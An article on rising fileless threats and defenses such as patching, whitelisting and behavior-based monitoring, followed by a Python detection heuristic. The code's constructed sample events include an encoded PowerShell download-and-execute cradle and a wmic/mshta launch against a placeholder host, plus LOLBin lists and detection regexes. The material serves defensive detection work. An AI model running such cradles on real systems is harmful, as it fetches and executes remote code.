Beyond malware: Why it’s time to take the fileless threat seriously
A new report has revealed that detections of “fileless” threats soared 265% from the first half of 2018 to the first six months of this year. Separately, fileless attacks were ranked by IT security pros last year as second only to zero-day threats as “most likely to compromise the organization.” Yet although they give attackers a ready way to slip past traditional, file-scanning security controls, they can still be detected, blocked and mitigated with a few best-practice steps.
What are fileless threats?
The term “fileless malware” is a little misleading because it is something of a catch-all, commonly used to refer to a range of quite diverse black hat techniques. Some of them even involve files on disk. Broadly speaking there are four different types of ‘fileless’ threat:
- Malicious documents carry embedded scripts or macros, letting attackers run code without dropping a standalone executable. This keeps them under the radar of tools that focus on executable files.
- Malicious scripts are executed directly by a web browser or a built-in script interpreter rather than being compiled into a binary.
- Malicious code injected straight into memory is never written to disk, so disk-scanning tools have nothing to inspect.
- Living off the land techniques abuse legitimate tools and applications that are already present on the system to carry out malicious actions, so the activity blends in with normal administration and is hard for system and security tools to tell apart.
Opportunity knocks
When it comes to living off the land, there is a multitude of legitimate Windows programs that can be abused for malicious ends. PowerShell is a favourite because it has deep access to the OS and is relied on by legitimate software and administration scripts, so disabling it outright is rarely an option for IT managers. Windows Management Instrumentation (WMI), PsExec, Visual Basic scripting, UAC bypass techniques and well over 100 other built-in tools and utilities can likewise be turned to an attacker’s ends.
Web pages, Office macros, Flash content, phishing, malicious browser extensions, stolen user credentials and in-memory exploits have all been used in the past to launch fileless attacks. The sheer range of options open to cyber-criminals creates a large attack surface for security teams to defend.
How do fileless threats affect my business?
Ultimately, these techniques are used to support whatever ends the attacker is trying to achieve. This could be:
Ransomware: the SamSam variant is often delivered via fileless techniques. Last year, the US Department of Justice said its operators had infected hundreds of US organizations, costing them over $30m since 2015.
Banking trojans: Emotet and Trickbot both use fileless techniques to infect millions of organizations around the world.
Cryptojacking: cyber-criminals have used fileless attacks in the past to infect victim organizations with cryptocurrency mining malware.
Data breaches: it stands to reason that the longer a hacker can stay hidden, the more damage they can do to a targeted organization. In the case of multi-stage information-stealing attacks, this could result in significant extra losses for the victim. The average global “dwell time” – the length of time hackers remain undetected – currently stands at over 100 days.
Back to basics
A Ponemon Institute report from last year predicted that fileless malware would account for 38% of all attacks in 2019. However, the good news is that there are plenty of things organizations can do to mitigate this growing risk. Your watchword throughout should be “defense-in-depth” – so that if one particular strategy isn’t effective, you have more opportunities to catch that threat by other means.
Consider the following:
- Regular patching to reduce the number of vulnerabilities fileless threats might seek to exploit
- Whitelist applications so that unapproved executables and scripts are blocked from running. Bear in mind that this does not by itself stop a whitelisted interpreter such as PowerShell from running malicious input, so pair it with the monitoring below
- Disable macros (or allow only signed macros) and Flash wherever they are not needed, to reduce the attack surface further
- Invest in advanced anti-malware tools that use behavior-based techniques rather than relying on file signatures alone. Because fileless threats give a scanner no file to match, the suspicious activity itself (an Office application spawning PowerShell, an encoded command that downloads and runs code in memory) is what there is to catch
- Tighten access controls and add two-factor authentication where possible for privileged accounts. This helps to halt the spread of malware across networks, because a stolen or cracked password alone will no longer be enough to log in elsewhere
- Run regular staff training and user awareness courses, to reduce the opportunity for hackers to launch attacks via phishing emails. When done right, these efforts can turn your weakest link into a strong first line of defense
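The behavior-based detection described in the list above, and the living-off-the-land abuse of PowerShell and WMI described earlier, can be illustrated with a small scoring rule run over process-creation events. The code below is an added example, not part of the original article or any vendor product. It assumes a hypothetical event layout (parent process, image, command line, roughly what Windows Security event 4688 provides once command-line auditing is on); the sample events, the indicator weights and the alert threshold are constructed for illustration and would need tuning against a real environment's baseline.

```python
"""Heuristic scoring of 'living off the land' PowerShell/WMI abuse over
process-creation events (added example; event layout and samples are constructed)."""
import base64
import re


def encode_ps(script):
    """UTF-16LE + base64, the encoding PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events with a hypothetical field layout (NOT real telemetry).
# 1002 models a malicious document: Word spawning a hidden, encoded download cradle.
# 1003 models WMI being used to launch mshta.exe against a remote payload.
SAMPLE_EVENTS = [
    {"pid": 1001, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
    {"pid": 1002, "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    {"pid": 1003, "parent": "cmd.exe", "image": "wmic.exe",
     "cmdline": 'wmic.exe process call create "mshta.exe http://example.invalid/p.hta"'},
    {"pid": 1004, "parent": "svchost.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\a\\notes.txt"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"powershell.exe", "pwsh.exe", "wmic.exe", "mshta.exe", "regsvr32.exe",
           "rundll32.exe", "certutil.exe", "cscript.exe", "wscript.exe", "psexec.exe"}

# (regex over the lower-cased, decoded command line, weight, human-readable label)
INDICATORS = [
    (r"\biex\b|invoke-expression", 3, "in-memory execution (IEX)"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", 3, "download cradle"),
    (r"frombase64string", 2, "embedded base64 payload"),
    (r"-w(indowstyle)?\s+hidden", 2, "hidden window"),
    (r"-nop\b|-noprofile", 1, "profile bypass"),
    (r"-ep\s+bypass|executionpolicy\s+bypass", 2, "execution policy bypass"),
    (r"process\s+call\s+create", 2, "WMI process spawn"),
    (r"mshta\.exe|regsvr32\.exe|rundll32\.exe", 1, "LOLBin chaining"),
    (r"https?://", 2, "remote URL in command line"),
]
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
ALERT_THRESHOLD = 5  # illustrative; tune against your own baseline


def decode_encoded_command(cmdline):
    """Replace a -EncodedCommand payload with its decoded script so the indicators
    can see it. Returns (command line, True if something was decoded)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline, False
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline, False  # not a valid encoded command; score the raw text
    return cmdline[:m.start()] + decoded, True


def score_event(ev):
    """Score one process-creation event. Returns (score, list of reasons)."""
    score, reasons = 0, []
    image, parent = ev["image"].lower(), ev["parent"].lower()
    text, was_encoded = decode_encoded_command(ev["cmdline"])
    text = text.lower()
    if was_encoded:
        score += 2
        reasons.append("encoded command")
    # Parent/child relationship: an Office app launching a LOLBin is the classic
    # malicious-document pattern and is worth more than any single string.
    if parent in OFFICE_PARENTS and image in LOLBINS:
        score += 4
        reasons.append(f"Office parent {parent} spawned {image}")
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, text):
            score += weight
            reasons.append(label)
    return score, reasons


def triage(events, threshold=ALERT_THRESHOLD):
    """Return (pid, score, reasons) for every event at or above the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append((ev["pid"], score, reasons))
    return alerts


if __name__ == "__main__":
    for pid, score, reasons in triage(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} score={score}: {', '.join(reasons)}")
```

Two design points carry over to real tooling. First, the encoded command is decoded before matching: a signature looking for `DownloadString` in the raw command line would miss event 1002 entirely, which is exactly why the article recommends behavior over signatures. Second, the parent/child relationship scores higher than any one string, so a plain `Get-Service` from an administrator's shell stays below the threshold while the same interpreter launched from Word does not; whitelisting alone would have allowed both, because `powershell.exe` is a legitimate, approved binary in both cases.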
Ultimately, hackers use any tools at their disposal that will improve their chances of success. Fileless tools and techniques will only work as long as they keep the black hats hidden in the shadows. By paying attention to these increasingly popular hacking strategies, you can shine a light on their activity, so that they’ll hopefully move on to an easier target.